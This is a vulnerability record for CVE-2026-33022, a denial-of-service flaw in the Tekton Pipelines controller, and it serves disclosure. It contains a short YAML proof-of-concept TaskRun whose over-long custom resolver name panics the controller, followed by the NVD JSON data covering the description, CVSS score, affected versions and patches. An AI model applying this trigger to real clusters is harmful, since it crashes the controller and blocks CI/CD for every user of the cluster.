CVE-2026-33022

apiVersion: tekton.dev/v1 kind: TaskRun metadata: name: poc-cve-2026-33022 spec: # Use a resolver name longer than 31 characters # to trigger the panic in the controller. taskRef: resolver: "this-is-a-very-long-custom-resolver-name-over-31-chars" params: - name: name value: example-task

{"cve": {"id": "CVE-2026-33022", "sourceIdentifier": "[email protected]", "published": "2026-03-20T08:16:11.293", "lastModified": "2026-03-24T16:19:48.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Versions 0.60.0 through 1.0.0, 1.1.0 through 1.3.2, 1.4.0 through 1.6.0, 1.7.0 through 1.9.0, 1.10.0, and 1.10.1 have a denial-of-service vulnerability in that allows any user who can create a TaskRun or PipelineRun to crash the controller cluster-wide by setting .spec.taskRef.resolver (or .spec.pipelineRef.resolver) to a string of 31+ characters. The crash occurs because GenerateDeterministicNameFromSpec produces a name exceeding the 63-character DNS-1123 label limit, and its truncation logic panics on a [-1] slice bound since the generated name contains no spaces. Once crashed, the controller enters a CrashLoopBackOff on restart (as it re-reconciles the offending resource), blocking all CI/CD reconciliation until the resource is manually deleted. Built-in resolvers (git, cluster, bundles, hub) are unaffected due to their short names, but any custom resolver name triggers the bug. The fix truncates the resolver-name prefix instead of the full string, preserving the hash suffix for determinism and uniqueness. This issue has been patched in versions 1.0.1, 1.3.3, 1.6.1, 1.9.2 and 1.10.2."}, {"lang": "es", "value": "El proyecto Tekton Pipelines proporciona recursos estilo k8s para declarar pipelines estilo CI/CD. Las versiones 0.60.0 a 1.0.0, 1.1.0 a 1.3.2, 1.4.0 a 1.6.0, 1.7.0 a 1.9.0, 1.10.0 y 1.10.1 tienen una vulnerabilidad de denegación de servicio que permite a cualquier usuario que pueda crear un TaskRun o PipelineRun bloquear el controlador en todo el clúster al establecer .spec.taskRef.resolver (o .spec.pipelineRef.resolver) a una cadena de 31 o más caracteres. El bloqueo ocurre porque GenerateDeterministicNameFromSpec produce un nombre que excede el límite de etiqueta DNS-1123 de 63 caracteres, y su lógica de truncamiento entra en pánico en un límite de segmento [-1] ya que el nombre generado no contiene espacios. Una vez bloqueado, el controlador entra en un CrashLoopBackOff al reiniciar (ya que vuelve a reconciliar el recurso infractor), bloqueando toda la reconciliación de CI/CD hasta que el recurso se elimine manualmente. Los resolvedores incorporados (git, cluster, bundles, hub) no se ven afectados debido a sus nombres cortos, pero cualquier nombre de resolvedor personalizado activa el error. La solución trunca el prefijo del nombre del resolvedor en lugar de la cadena completa, preservando el sufijo hash para determinismo y unicidad. Este problema ha sido parcheado en las versiones 1.0.1, 1.3.3, 1.6.1, 1.9.2 y 1.10.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:tekton_pipelines:*:*:*:*:*:go:*:*", "versionStartIncluding": "0.60.0", "versionEndExcluding": "1.0.1", "matchCriteriaId": "F365D90F-DED5-4C32-9C73-3D5FF467778B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:tekton_pipelines:*:*:*:*:*:go:*:*", "versionStartIncluding": "1.1.0", "versionEndExcluding": "1.3.3", "matchCriteriaId": "510D5C7F-FB2A-4059-AF03-A85FD23267F3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:tekton_pipelines:*:*:*:*:*:go:*:*", "versionStartIncluding": "1.4.0", "versionEndExcluding": "1.6.1", "matchCriteriaId": "B4303F35-5E39-4F4B-9258-FE58CCA3C760"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:tekton_pipelines:*:*:*:*:*:go:*:*", "versionStartIncluding": "1.7.0", "versionEndExcluding": "1.9.2", "matchCriteriaId": "C465CD0F-E9E8-414D-9BED-49BEBD394E95"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:tekton_pipelines:*:*:*:*:*:go:*:*", "versionStartIncluding": "1.10.0", "versionEndExcluding": "1.10.2", "matchCriteriaId": "871426E3-9DCC-43CE-8262-D87D4F040AEE"}]}]}], "references": [{"url": "https://github.com/tektoncd/pipeline/commit/5eead3f859b9f938e86039e4d29185092c1d4ee6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-cv4x-93xx-wgfj", "source": "[email protected]", "tags": ["Patch", "Vendor Adv ... (truncated)